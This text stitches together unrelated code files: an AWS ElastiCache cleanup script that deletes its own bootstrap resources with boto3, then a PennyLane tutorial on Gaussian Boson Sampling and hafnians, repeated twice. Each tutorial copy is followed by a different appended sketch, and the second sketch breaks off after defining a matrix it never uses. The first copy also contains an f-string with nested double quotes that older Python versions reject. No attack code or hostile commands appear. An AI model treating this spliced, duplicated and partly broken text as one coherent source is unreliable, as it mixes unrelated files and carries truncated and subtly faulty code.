# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may # not use this file except in compliance with the License. A copy of the # License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. """Cleans up the resources created by the Elasticache bootstrapping process. """ import boto3 import logging from elasticache.service_bootstrap import BootstrapResources def delete_sns_topic(topic_ARN: str): sns = boto3.client("sns") sns.delete_topic(TopicArn=topic_ARN) logging.info(f"Deleted SNS topic {topic_ARN}") def delete_security_group(sg_id: str): ec2 = boto3.client("ec2") ec2.delete_security_group(GroupId=sg_id) logging.info(f"Deleted VPC Security Group {sg_id}") def delete_user_group(usergroup_id: str): ec = boto3.client("elasticache") ec.delete_user_group(UserGroupId=usergroup_id) logging.info(f"Deleted ElastiCache User Group {usergroup_id}") # KMS does not allow immediate key deletion; 7 days is the shortest deletion window def delete_kms_key(key_id: str): kms = boto3.client("kms") kms.schedule_key_deletion(KeyId=key_id, PendingWindowInDays=7) logging.info(f"Deletion scheduled for KMS key {key_id}") # delete snapshot and also associated cluster/RG def delete_snapshot(snapshot_name: str): ec = boto3.client("elasticache") # delete actual snapshot response = ec.describe_snapshots(SnapshotName=snapshot_name) snapshot = response['Snapshots'][0] ec.delete_snapshot(SnapshotName=snapshot_name) logging.info(f"Deleted snapshot {snapshot_name}") # delete resource that was used to create snapshot if snapshot['CacheClusterId']: ec.delete_cache_cluster(CacheClusterId=snapshot['CacheClusterId']) logging.info(f"Deleted cache cluster {snapshot['CacheClusterId']}") elif snapshot['ReplicationGroupId']: # should not happen ec.delete_replication_group(ReplicationGroupId=snapshot['ReplicationGroupId']) logging.info(f"Deleted replication group {snapshot['ReplicationGroupId']}") def service_cleanup(config: dict): logging.getLogger().setLevel(logging.INFO) resources = BootstrapResources( **config ) try: delete_sns_topic(resources.SnsTopicARN) except: logging.exception(f"Unable to delete SNS topic {resources.SnsTopicARN}") try: delete_security_group(resources.SecurityGroupID) except: logging.exception(f"Unable to delete VPC Security Group {resources.SecurityGroupID}") try: delete_user_group(resources.UserGroupID) except: logging.exception(f"Unable to delete ElastiCache User Group {resources.UserGroupID}") try: delete_kms_key(resources.KmsKeyID) except: logging.exception(f"Unable to schedule deletion for KMS key {resources.KmsKeyID}") try: delete_snapshot(resources.SnapshotName) except: logging.exception(f"Unable to delete snapshot {resources.SnapshotName}")
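# --- Illustrative sketch (not part of the module above) -------------------------------
# service_cleanup() constructs a BootstrapResources object straight from the config dict,
# and the attributes accessed above imply at least the following keys. All values are
# placeholders; in practice the dict comes from the bootstrap step's output. Each delete
# is wrapped in its own try/except, so a failure on one resource (logged via
# logging.exception) does not stop cleanup of the remaining ones.
example_config = {
    "SnsTopicARN": "arn:aws:sns:us-west-2:123456789012:example-topic",
    "SecurityGroupID": "sg-0123456789abcdef0",
    "UserGroupID": "example-user-group",
    "KmsKeyID": "11111111-2222-3333-4444-555555555555",
    "SnapshotName": "example-snapshot",
}

# service_cleanup(example_config)  # would issue real AWS calls with valid credentials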
r""" .. role:: html(raw) :format: html Quantum advantage with Gaussian Boson Sampling ============================================== .. meta:: :property="og:description": Using light to perform tasks beyond the reach of classical computers. :property="og:image": https://pennylane.ai/qml/_images/tutorial_gbs_expt2.png .. related:: tutorial_gaussian_transformation Gaussian transformation qsim_beyond_classical Beyond classical computing with qsim qonn Optimizing a quantum optical neural network *Author: PennyLane dev team. Posted: 4 Dec 2020. Last updated: 4 Dec 2020.* On the journey to large-scale fault-tolerant quantum computers, one of the first major milestones is to demonstrate a quantum device carrying out tasks that are beyond the reach of any classical algorithm. The Google Quantum team was the first to claim this achievement, announced in their paper `Quantum supremacy using a programmable superconducting processor <https://www.nature.com/articles/s41586-019-1666-5>`__ [#Arute2019]_. Now a team led by Chao-Yang Lu and Jian-Wei Pan has performed a similar feat using quantum photonics. While Google's experiment performed the task of :doc:`random circuit sampling </demos/qsim_beyond_classical>` using a superconducting processor, the new experiment, published in the paper `Quantum computational advantage using photons <https://science.sciencemag.org/content/early/2020/12/02/science.abe8770?rss=1>`__ [#Zhong2020]_ leverages the quantum properties of light to tackle a task called `Gaussian Boson Sampling <https://strawberryfields.ai/photonics/concepts/gbs.html>`__ (GBS). This tutorial will walk you through the basic elements of GBS, motivate why it is classically challenging, and show you how to explore GBS using PennyLane and the photonic quantum devices accessible via the `PennyLane-Strawberry Fields plugin <https://pennylane-sf.readthedocs.io>`__. If you are interested in possible applications of GBS, or want to access programmable GBS hardware via the cloud, check out the `Strawberry Fields website <https://strawberryfields.ai/>`__ for more details. | .. image:: /demonstrations/tutorial_gbs_expt2.png :align: center :width: 80% :target: javascript:void(0); .. figure:: /demonstrations/tutorial_gbs_expt1.png :align: center :width: 80% :target: javascript:void(0); *Illustration of the experimental setup used by Zhong et al. in Quantum computational advantage using photons* [#Zhong2020]_. The origins of GBS ------------------ Let's first explain the name. `Boson <https://en.wikipedia.org/wiki/Boson>`__ refers to bosonic matter, which, along with fermions, makes up one of the two elementary classes of particles. The most prevalent bosonic system in our everyday lives is light, which is made of particles called photons. Another famous example, though much harder to find, is the Higgs boson. The distinguishing characteristic of bosons is that they follow "Bose-Einstein statistics", which very loosely means that the particles like to bunch together (contrast this to fermionic matter like electrons, which must follow the Pauli Exclusion Principle and keep apart). This property can be observed in simple interference experiments such as the `Hong-Ou Mandel setup <https://en.wikipedia.org/wiki/Hong%E2%80%93Ou%E2%80%93Mandel_effect>`__. If two single photons are interfered on a balanced beamsplitter, they will both emerge at the same output port---there is zero probability that they will emerge at separate outputs. 
This is a simple but notable quantum property of light; if electrons were brought together in a similar experiement, they would always appear at separate output ports. Gaussian Boson Sampling [#hamilton2017]_ is, in fact, a member of a larger family of "Boson Sampling" algorithms, stemming back to the initial proposal of Aaronson and Arkhipov [#aaronson2013]_ in 2013. Boson Sampling is quantum interferometry writ large. Aaronson and Arkhipov's original proposal was to inject many single photons into distinct input ports of a large interferometer, then measure which output ports they appear at. The natural interference properties of bosons means that photons will appear at the output ports in very unique and specific ways. Boson Sampling was not proposed with any kind of practical real-world use-case in mind. Like the random circuit sampling, it's just a quantum system being its best self. With sufficient size and quality, it is strongly believed to be hard for a classical computer to simulate this efficiently. Finally, the "Gaussian" in GBS refers to the fact that we modify the original Boson Sampling proposal slightly: instead of injecting single photons---which are hard to jointly create in the size and quality needed to demonstrate Boson Sampling conclusively---we instead use states of light that are experimentally less demanding (though still challenging!). These states of light are called Gaussian states, because they bear strong connections to the `Gaussian (or Normal) distribution <https://en.wikipedia.org/wiki/Normal_distribution>`__ from statistics. In practice, we use a particular Gaussian state called a `squeezed state <https://en.wikipedia.org/wiki/Squeezed_states_of_light>`__ for the inputs, since these are arguably the most non-classical of Gaussian states. .. note:: While computationally hard to simulate, Boson Sampling devices, on their own, are not capable of universal quantum computing. However, in combination with other components, GBS is a key building block for a universal device [#Bourassa2020]_. Coding a GBS algorithm ---------------------- The researchers in [#Zhong2020]_ experimentally demonstrate a GBS device by preparing 50 squeezed states and injecting them into a 100-mode interferometer. In this demo, in order to keep things classically simulable, we will stick to a much simpler setting consisting of 4 squeezed states injected into a 4-mode interferometer. At a high level, an interferometer on :math:`N` modes can be represented using an :math:`N\times N` unitary matrix :math:`U`. When decomposed into a quantum optical circuit, the interferometer will be made up of beamsplitters and phase shifters. .. image:: /demonstrations/tutorial_gbs_circuit2.png :align: center :width: 90% :target: javascript:void(0); .. raw:: html <br> Simulating this circuit using PennyLane is easy; we can simply read off the gates from left to right, and convert it into a QNode. """ import numpy as np # set the random seed np.random.seed(42) # import PennyLane import pennylane as qml ###################################################################### # We must define the unitary matrix we would like to embed in the circuit. # We will use SciPy to generate a Haar-random unitary: from scipy.stats import unitary_group # define the linear interferometer U = unitary_group.rvs(4) print(U) ###################################################################### # We can now use this to construct the circuit, choosing a compatible # device. 
For the simulation, we can use the Strawberry Fields # Gaussian backend. This backend is perfectly suited for simulation of GBS, # as the initial states are Gaussian, and all gates transform Gaussian states to other # Gaussian states. n_wires = 4 cutoff = 10 dev = qml.device("strawberryfields.gaussian", wires=n_wires, cutoff_dim=cutoff) @qml.qnode(dev) def gbs_circuit(): # prepare the input squeezed states for i in range(n_wires): qml.Squeezing(1.0, 0.0, wires=i) # linear interferometer qml.Interferometer(U, wires=range(n_wires)) return qml.probs(wires=range(n_wires)) ###################################################################### # A couple of things to note in this particular example: # # 1. To prepare the input single mode squeezed vacuum state :math:`\ket{re^{i\phi}}`, # where :math:`r = 1` and :math:`\phi=0`, we # apply a squeezing gate (:class:`~pennylane.Squeezing`) to each of the wires (initially in # the vacuum state). # # 2. Next we apply the linear interferometer to all four wires using # :class:`~pennylane.Interferometer` and the unitary matrix ``U``. This operator # decomposes the unitary matrix representing the linear interferometer into single-mode # rotation gates (:class:`~pennylane.PhaseShift`) and two-mode beamsplitters # (:class:`~pennylane.Beamsplitter`). After applying the interferometer, we will denote the # output state by :math:`\ket{\psi'}`. # # 3. GBS takes place physically in an infinite-dimensional Hilbert space, # which is not practical for simulation. We need to set an upper limit on the maximum # number of photons we can detect. This is the # ``cutoff`` value we defined above; we will only be considering detection events # containing 0 to 9 photons per mode. # # We can now execute the QNode, and extract the resulting probability distribution: probs = gbs_circuit().reshape([cutoff] * n_wires) print(probs.shape) ###################################################################### # For example, element ``[1,2,0,1]`` represents the probability of # detecting 1 photon on wire # ``0`` and wire ``3``, and 2 photons at wire ``1``, i.e., the value # # .. math:: \text{prob}(1,2,0,1) = \left|\braketD{1,2,0,1}{\psi'}\right|^2. # # Let's extract and view the probabilities of measuring various Fock states. # Fock states to measure at output measure_states = [(0,0,0,0), (1,1,0,0), (0,1,0,1), (1,1,1,1), (2,0,0,0)] # extract the probabilities of calculating several # different Fock states at the output, and print them out for i in measure_states: print(f"|{"".join(str(j) for j in i)}>: {probs[i]}") ###################################################################### # The GBS Distribution # -------------------- # # Hamilton et al. [#hamilton2017]_ showed that the probability of # measuring a final state containing only 0 or 1 photons per mode is given by # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(U(\bigoplus_i\tanh(r_i))U^T)]_{st}\right|^2}{\prod_{i=1}^N \cosh(r_i)} # # i.e., the sampled single-photon probability distribution is proportional to the **hafnian** of a # submatrix of :math:`U(\bigoplus_i\tanh(r_i))U^T`. # # .. note:: # # The hafnian of a matrix is defined by # # .. math:: \text{Haf}(A) = \sum_{\sigma \in \text{PMP}_{2N}}\prod_{i=1}^N A_{\sigma(2i-1)\sigma(2i)}, # # where :math:`\text{PMP}_{2N}` is the set of all perfect matching permutations of :math:`2N` elements. 
In graph theory, the # hafnian calculates the number of perfect `matchings # <https://en.wikipedia.org/wiki/Matching_(graph_theory)>`_ in a graph with # adjacency matrix :math:`A`. # # Compare this to the permanent, which calculates the number of perfect matchings on a *bipartite* # graph. Notably, the permanent appears in vanilla Boson Sampling in a similar way # that the hafnian appears in GBS. # The hafnian turns out to be a generalization of the permanent, with the relationship # # .. math:: # # \text{Per(A)} = \text{Haf}\left(\left[\begin{matrix} # 0&A\\ A^T&0 # \end{matrix}\right]\right). # # As any algorithm that could calculate (or even approximate) the hafnian could also calculate the # permanent---a `#P-hard problem <https://en.wikipedia.org/wiki/%E2%99%AFP>`__---it follows that # calculating or approximating the hafnian must also be a classically hard problem. This lies behind # the classical hardness of GBS. # # In this demo, we will use the same squeezing parameter, :math:`z=r`, for # all input states; this allows us to simplify this equation. To start with, the hafnian expression # simply becomes :math:`\text{Haf}[(UU^T\tanh(r))]_{st}`, removing the need for the direct sum. # # Thus, we have # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(UU^T\tanh(r))]_{st}\right|^2}{n_1!n_2!\cdots n_N!\cosh^N(r)}. # # Now that we have the theoretical formulas, as well as the probabilities from our simulated GBS # QNode, we can compare the two and see whether they agree. # # In order to calculate the probability of different GBS events classically, we need a # method for calculating the hafnian. # For this, we will use `The Walrus # <https://the-walrus.readthedocs.io>`_ library (which is installed as a dependency of the # PennyLane-SF plugin): from thewalrus import hafnian as haf ###################################################################### # Now, for the right-hand side numerator, we first calculate the submatrix # :math:`A = [(UU^T\tanh(r))]_{st}`: A = (np.dot(U, U.T) * np.tanh(1)) ###################################################################### # In GBS, we determine the submatrix by taking the # rows and columns corresponding to the measured Fock state. For example, to calculate the submatrix # in the case of the output measurement :math:`\left|{1,1,0,0}\right\rangle`, # we have print(A[:, [0, 1]][[0, 1]]) ###################################################################### # i.e., we consider only the rows and columns where a photon was detected, which gives us # the submatrix corresponding to indices :math:`0` and :math:`1`. ###################################################################### # Comparing to simulation # ----------------------- # # Now that we have a method for calculating the hafnian, let's compare the output to that provided by # the PennyLane QNode. 
# # **Measuring** :math:`\ket{0,0,0,0}` **at the output** # # This corresponds to the hafnian of an *empty* matrix, which is simply 1: print(1 / np.cosh(1) ** 4) print(probs[0, 0, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{1,1,0,0}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 1]][[0, 1]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{0,1,0,1}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [1, 3]][[1, 3]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[0, 1, 0, 1]) ###################################################################### # **Measuring** :math:`\ket{1,1,1,1}` **at the output** # # This corresponds to the hafnian of the full matrix :math:`A=UU^T\tanh(r)`: A = (np.dot(U, U.T) * np.tanh(1)) print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 1, 1]) ###################################################################### # **Measuring** :math:`\ket{2,0,0,0}` **at the output** # # Since we have two photons in mode ``q[0]``, we take two copies of the # first row and first column, making sure to divide by :math:`2!`: A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 0]][[0, 0]] print(np.abs(haf(A)) ** 2 / (2 * np.cosh(1) ** 4)) print(probs[2, 0, 0, 0]) ###################################################################### # The PennyLane simulation results agree (with almost negligible numerical error) to the # expected result from the Gaussian boson sampling equation! # # This demo provides an entry-level walkthrough to the ideas behind GBS, # providing you with the basic code needed for exploring the ideas behind # the photonic quantum advantage paper. Try changing the number of modes, # the number of injected squeezed states, or the cutoff dimension, and # see how each of these affect the classical computation time. If you're # interested in learning more about GBS, or about photonic quantum # computing in general, the # `Strawberry Fields website <https://strawberryfields.ai/>`__ is a great resource. # # References # ---------- # # .. [#Arute2019] # # Arute, F., Arya, K., Babbush, R., et al. "Quantum supremacy using a programmable # superconducting processor" # `Nature 574, 505-510 (2019) <https://doi.org/10.1038/s41586-019-1666-5>`__. # # .. [#Zhong2020] # # Zhong, H.-S., Wang, H., Deng, Y.-H., et al. (2020). Quantum computational advantage using photons. Science, 10.1126/science.abe8770. # # .. [#hamilton2017] # # Craig S. Hamilton, Regina Kruse, Linda Sansoni, Sonja Barkhofen, Christine Silberhorn, # and Igor Jex. Gaussian boson sampling. Physical Review Letters, 119:170501, Oct 2017. # arXiv:1612.01199, doi:10.1103/PhysRevLett.119.170501. # # .. [#aaronson2013] # # Scott Aaronson and Alex Arkhipov. The computational complexity of linear optics. Theory of # Computing, 9(1):143–252, 2013. doi:10.4086/toc.2013.v009a004. # # .. [#Bourassa2020] # # Bourassa, J. E., Alexander, R. N., Vasmer, et al. (2020). Blueprint for a scalable # photonic fault-tolerant quantum computer. arXiv preprint arXiv:2010.02905. #
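######################################################################
# As a final check, we can wrap the by-hand submatrix construction used above
# into a small helper that computes the theoretical probability for an
# arbitrary detection pattern. This is only a sketch for the uniform squeezing
# (r = 1) used throughout this demo, and the helper name ``gbs_probability``
# is purely illustrative.

from math import factorial


def gbs_probability(pattern, U, r=1.0):
    """Theoretical GBS probability of detecting ``pattern`` photons per mode,
    assuming every input mode is squeezed by the same parameter ``r``.

    Each mode index is repeated once per detected photon (exactly as done by
    hand above), and the result is normalised by the product of factorials
    and cosh^N(r).
    """
    modes = [m for m, n in enumerate(pattern) for _ in range(n)]
    A = (np.dot(U, U.T) * np.tanh(r))[np.ix_(modes, modes)]
    norm = np.prod([factorial(n) for n in pattern]) * np.cosh(r) ** len(pattern)
    return np.abs(haf(A)) ** 2 / norm


# this should reproduce the |2,0,0,0> comparison printed above
print(gbs_probability((2, 0, 0, 0), U))
print(probs[2, 0, 0, 0])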
r""" .. role:: html(raw) :format: html Quantum advantage with Gaussian Boson Sampling ============================================== .. meta:: :property="og:description": Using light to perform tasks beyond the reach of classical computers. :property="og:image": https://pennylane.ai/qml/_images/tutorial_gbs_expt2.png .. related:: tutorial_gaussian_transformation Gaussian transformation qsim_beyond_classical Beyond classical computing with qsim qonn Optimizing a quantum optical neural network *Author: PennyLane dev team. Posted: 4 Dec 2020. Last updated: 4 Dec 2020.* On the journey to large-scale fault-tolerant quantum computers, one of the first major milestones is to demonstrate a quantum device carrying out tasks that are beyond the reach of any classical algorithm. The Google Quantum team was the first to claim this achievement, announced in their paper `Quantum supremacy using a programmable superconducting processor <https://www.nature.com/articles/s41586-019-1666-5>`__ [#Arute2019]_. Now a team led by Chao-Yang Lu and Jian-Wei Pan has performed a similar feat using quantum photonics. While Google's experiment performed the task of :doc:`random circuit sampling </demos/qsim_beyond_classical>` using a superconducting processor, the new experiment, published in the paper `Quantum computational advantage using photons <https://science.sciencemag.org/content/early/2020/12/02/science.abe8770?rss=1>`__ [#Zhong2020]_ leverages the quantum properties of light to tackle a task called `Gaussian Boson Sampling <https://strawberryfields.ai/photonics/concepts/gbs.html>`__ (GBS). This tutorial will walk you through the basic elements of GBS, motivate why it is classically challenging, and show you how to explore GBS using PennyLane and the photonic quantum devices accessible via the `PennyLane-Strawberry Fields plugin <https://pennylane-sf.readthedocs.io>`__. If you are interested in possible applications of GBS, or want to access programmable GBS hardware via the cloud, check out the `Strawberry Fields website <https://strawberryfields.ai/>`__ for more details. | .. image:: /demonstrations/tutorial_gbs_expt2.png :align: center :width: 80% :target: javascript:void(0); .. figure:: /demonstrations/tutorial_gbs_expt1.png :align: center :width: 80% :target: javascript:void(0); *Illustration of the experimental setup used by Zhong et al. in Quantum computational advantage using photons* [#Zhong2020]_. The origins of GBS ------------------ Let's first explain the name. `Boson <https://en.wikipedia.org/wiki/Boson>`__ refers to bosonic matter, which, along with fermions, makes up one of the two elementary classes of particles. The most prevalent bosonic system in our everyday lives is light, which is made of particles called photons. Another famous example, though much harder to find, is the Higgs boson. The distinguishing characteristic of bosons is that they follow "Bose-Einstein statistics", which very loosely means that the particles like to bunch together (contrast this to fermionic matter like electrons, which must follow the Pauli Exclusion Principle and keep apart). This property can be observed in simple interference experiments such as the `Hong-Ou Mandel setup <https://en.wikipedia.org/wiki/Hong%E2%80%93Ou%E2%80%93Mandel_effect>`__. If two single photons are interfered on a balanced beamsplitter, they will both emerge at the same output port---there is zero probability that they will emerge at separate outputs. 
This is a simple but notable quantum property of light; if electrons were brought together in a similar experiement, they would always appear at separate output ports. Gaussian Boson Sampling [#hamilton2017]_ is, in fact, a member of a larger family of "Boson Sampling" algorithms, stemming back to the initial proposal of Aaronson and Arkhipov [#aaronson2013]_ in 2013. Boson Sampling is quantum interferometry writ large. Aaronson and Arkhipov's original proposal was to inject many single photons into distinct input ports of a large interferometer, then measure which output ports they appear at. The natural interference properties of bosons means that photons will appear at the output ports in very unique and specific ways. Boson Sampling was not proposed with any kind of practical real-world use-case in mind. Like the random circuit sampling, it's just a quantum system being its best self. With sufficient size and quality, it is strongly believed to be hard for a classical computer to simulate this efficiently. Finally, the "Gaussian" in GBS refers to the fact that we modify the original Boson Sampling proposal slightly: instead of injecting single photons---which are hard to jointly create in the size and quality needed to demonstrate Boson Sampling conclusively---we instead use states of light that are experimentally less demanding (though still challenging!). These states of light are called Gaussian states, because they bear strong connections to the `Gaussian (or Normal) distribution <https://en.wikipedia.org/wiki/Normal_distribution>`__ from statistics. In practice, we use a particular Gaussian state called a `squeezed state <https://en.wikipedia.org/wiki/Squeezed_states_of_light>`__ for the inputs, since these are arguably the most non-classical of Gaussian states. .. note:: While computationally hard to simulate, Boson Sampling devices, on their own, are not capable of universal quantum computing. However, in combination with other components, GBS is a key building block for a universal device [#Bourassa2020]_. Coding a GBS algorithm ---------------------- The researchers in [#Zhong2020]_ experimentally demonstrate a GBS device by preparing 50 squeezed states and injecting them into a 100-mode interferometer. In this demo, in order to keep things classically simulable, we will stick to a much simpler setting consisting of 4 squeezed states injected into a 4-mode interferometer. At a high level, an interferometer on :math:`N` modes can be represented using an :math:`N\times N` unitary matrix :math:`U`. When decomposed into a quantum optical circuit, the interferometer will be made up of beamsplitters and phase shifters. .. image:: /demonstrations/tutorial_gbs_circuit2.png :align: center :width: 90% :target: javascript:void(0); .. raw:: html <br> Simulating this circuit using PennyLane is easy; we can simply read off the gates from left to right, and convert it into a QNode. """ import numpy as np # set the random seed np.random.seed(42) # import PennyLane import pennylane as qml ###################################################################### # We must define the unitary matrix we would like to embed in the circuit. # We will use SciPy to generate a Haar-random unitary: from scipy.stats import unitary_group # define the linear interferometer U = unitary_group.rvs(4) print(U) ###################################################################### # We can now use this to construct the circuit, choosing a compatible # device. 
For the simulation, we can use the Strawberry Fields # Gaussian backend. This backend is perfectly suited for simulation of GBS, # as the initial states are Gaussian, and all gates transform Gaussian states to other # Gaussian states. n_wires = 4 cutoff = 10 dev = qml.device("strawberryfields.gaussian", wires=n_wires, cutoff_dim=cutoff) @qml.qnode(dev) def gbs_circuit(): # prepare the input squeezed states for i in range(n_wires): qml.Squeezing(1.0, 0.0, wires=i) # linear interferometer qml.Interferometer(U, wires=range(n_wires)) return qml.probs(wires=range(n_wires)) ###################################################################### # A couple of things to note in this particular example: # # 1. To prepare the input single mode squeezed vacuum state :math:`\ket{re^{i\phi}}`, # where :math:`r = 1` and :math:`\phi=0`, we # apply a squeezing gate (:class:`~pennylane.Squeezing`) to each of the wires (initially in # the vacuum state). # # 2. Next we apply the linear interferometer to all four wires using # :class:`~pennylane.Interferometer` and the unitary matrix ``U``. This operator # decomposes the unitary matrix representing the linear interferometer into single-mode # rotation gates (:class:`~pennylane.PhaseShift`) and two-mode beamsplitters # (:class:`~pennylane.Beamsplitter`). After applying the interferometer, we will denote the # output state by :math:`\ket{\psi'}`. # # 3. GBS takes place physically in an infinite-dimensional Hilbert space, # which is not practical for simulation. We need to set an upper limit on the maximum # number of photons we can detect. This is the # ``cutoff`` value we defined above; we will only be considering detection events # containing 0 to 9 photons per mode. # # We can now execute the QNode, and extract the resulting probability distribution: probs = gbs_circuit().reshape([cutoff] * n_wires) print(probs.shape) ###################################################################### # For example, element ``[1,2,0,1]`` represents the probability of # detecting 1 photon on wire # ``0`` and wire ``3``, and 2 photons at wire ``1``, i.e., the value # # .. math:: \text{prob}(1,2,0,1) = \left|\braketD{1,2,0,1}{\psi'}\right|^2. # # Let's extract and view the probabilities of measuring various Fock states. # Fock states to measure at output measure_states = [(0,0,0,0), (1,1,0,0), (0,1,0,1), (1,1,1,1), (2,0,0,0)] # extract the probabilities of calculating several # different Fock states at the output, and print them out for i in measure_states: print(f"|{''.join(str(j) for j in i)}>: {probs[i]}") ###################################################################### # The GBS Distribution # -------------------- # # Hamilton et al. [#hamilton2017]_ showed that the probability of # measuring a final state containing only 0 or 1 photons per mode is given by # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(U(\bigoplus_i\tanh(r_i))U^T)]_{st}\right|^2}{\prod_{i=1}^N \cosh(r_i)} # # i.e., the sampled single-photon probability distribution is proportional to the **hafnian** of a # submatrix of :math:`U(\bigoplus_i\tanh(r_i))U^T`. # # .. note:: # # The hafnian of a matrix is defined by # # .. math:: \text{Haf}(A) = \sum_{\sigma \in \text{PMP}_{2N}}\prod_{i=1}^N A_{\sigma(2i-1)\sigma(2i)}, # # where :math:`\text{PMP}_{2N}` is the set of all perfect matching permutations of :math:`2N` elements. 
In graph theory, the # hafnian calculates the number of perfect `matchings # <https://en.wikipedia.org/wiki/Matching_(graph_theory)>`_ in a graph with # adjacency matrix :math:`A`. # # Compare this to the permanent, which calculates the number of perfect matchings on a *bipartite* # graph. Notably, the permanent appears in vanilla Boson Sampling in a similar way # that the hafnian appears in GBS. # The hafnian turns out to be a generalization of the permanent, with the relationship # # .. math:: # # \text{Per(A)} = \text{Haf}\left(\left[\begin{matrix} # 0&A\\ A^T&0 # \end{matrix}\right]\right). # # As any algorithm that could calculate (or even approximate) the hafnian could also calculate the # permanent---a `#P-hard problem <https://en.wikipedia.org/wiki/%E2%99%AFP>`__---it follows that # calculating or approximating the hafnian must also be a classically hard problem. This lies behind # the classical hardness of GBS. # # In this demo, we will use the same squeezing parameter, :math:`z=r`, for # all input states; this allows us to simplify this equation. To start with, the hafnian expression # simply becomes :math:`\text{Haf}[(UU^T\tanh(r))]_{st}`, removing the need for the direct sum. # # Thus, we have # # .. math:: # # \left|\left\langle{n_1,n_2,\dots,n_N}\middle|{\psi'}\right\rangle\right|^2 = # \frac{\left|\text{Haf}[(UU^T\tanh(r))]_{st}\right|^2}{n_1!n_2!\cdots n_N!\cosh^N(r)}. # # Now that we have the theoretical formulas, as well as the probabilities from our simulated GBS # QNode, we can compare the two and see whether they agree. # # In order to calculate the probability of different GBS events classically, we need a # method for calculating the hafnian. # For this, we will use `The Walrus # <https://the-walrus.readthedocs.io>`_ library (which is installed as a dependency of the # PennyLane-SF plugin): from thewalrus import hafnian as haf ###################################################################### # Now, for the right-hand side numerator, we first calculate the submatrix # :math:`A = [(UU^T\tanh(r))]_{st}`: A = (np.dot(U, U.T) * np.tanh(1)) ###################################################################### # In GBS, we determine the submatrix by taking the # rows and columns corresponding to the measured Fock state. For example, to calculate the submatrix # in the case of the output measurement :math:`\left|{1,1,0,0}\right\rangle`, # we have print(A[:, [0, 1]][[0, 1]]) ###################################################################### # i.e., we consider only the rows and columns where a photon was detected, which gives us # the submatrix corresponding to indices :math:`0` and :math:`1`. ###################################################################### # Comparing to simulation # ----------------------- # # Now that we have a method for calculating the hafnian, let's compare the output to that provided by # the PennyLane QNode. 
# # **Measuring** :math:`\ket{0,0,0,0}` **at the output** # # This corresponds to the hafnian of an *empty* matrix, which is simply 1: print(1 / np.cosh(1) ** 4) print(probs[0, 0, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{1,1,0,0}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 1]][[0, 1]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 0, 0]) ###################################################################### # **Measuring** :math:`\ket{0,1,0,1}` **at the output** A = (np.dot(U, U.T) * np.tanh(1))[:, [1, 3]][[1, 3]] print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[0, 1, 0, 1]) ###################################################################### # **Measuring** :math:`\ket{1,1,1,1}` **at the output** # # This corresponds to the hafnian of the full matrix :math:`A=UU^T\tanh(r)`: A = (np.dot(U, U.T) * np.tanh(1)) print(np.abs(haf(A)) ** 2 / np.cosh(1) ** 4) print(probs[1, 1, 1, 1]) ###################################################################### # **Measuring** :math:`\ket{2,0,0,0}` **at the output** # # Since we have two photons in mode ``q[0]``, we take two copies of the # first row and first column, making sure to divide by :math:`2!`: A = (np.dot(U, U.T) * np.tanh(1))[:, [0, 0]][[0, 0]] print(np.abs(haf(A)) ** 2 / (2 * np.cosh(1) ** 4)) print(probs[2, 0, 0, 0]) ###################################################################### # The PennyLane simulation results agree (with almost negligible numerical error) to the # expected result from the Gaussian boson sampling equation! # # This demo provides an entry-level walkthrough to the ideas behind GBS, # providing you with the basic code needed for exploring the ideas behind # the photonic quantum advantage paper. Try changing the number of modes, # the number of injected squeezed states, or the cutoff dimension, and # see how each of these affect the classical computation time. If you're # interested in learning more about GBS, or about photonic quantum # computing in general, the # `Strawberry Fields website <https://strawberryfields.ai/>`__ is a great resource. # # References # ---------- # # .. [#Arute2019] # # Arute, F., Arya, K., Babbush, R., et al. "Quantum supremacy using a programmable # superconducting processor" # `Nature 574, 505-510 (2019) <https://doi.org/10.1038/s41586-019-1666-5>`__. # # .. [#Zhong2020] # # Zhong, H.-S., Wang, H., Deng, Y.-H., et al. (2020). Quantum computational advantage using photons. Science, 10.1126/science.abe8770. # # .. [#hamilton2017] # # Craig S. Hamilton, Regina Kruse, Linda Sansoni, Sonja Barkhofen, Christine Silberhorn, # and Igor Jex. Gaussian boson sampling. Physical Review Letters, 119:170501, Oct 2017. # arXiv:1612.01199, doi:10.1103/PhysRevLett.119.170501. # # .. [#aaronson2013] # # Scott Aaronson and Alex Arkhipov. The computational complexity of linear optics. Theory of # Computing, 9(1):143–252, 2013. doi:10.4086/toc.2013.v009a004. # # .. [#Bourassa2020] # # Bourassa, J. E., Alexander, R. N., Vasmer, et al. (2020). Blueprint for a scalable # photonic fault-tolerant quantum computer. arXiv preprint arXiv:2010.02905. #
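######################################################################
# As an aside, we can numerically illustrate the relationship between the
# permanent and the hafnian quoted above. This is a minimal sketch: the
# brute-force permanent below is defined here purely for illustration and is
# only practical for tiny matrices.

from itertools import permutations


def permanent_bruteforce(M):
    """Permanent by direct summation over all permutations (tiny matrices only)."""
    n = M.shape[0]
    return sum(
        np.prod([M[i, sigma[i]] for i in range(n)]) for sigma in permutations(range(n))
    )


M = np.random.rand(3, 3)
block = np.block([[np.zeros((3, 3)), M], [M.T, np.zeros((3, 3))]])

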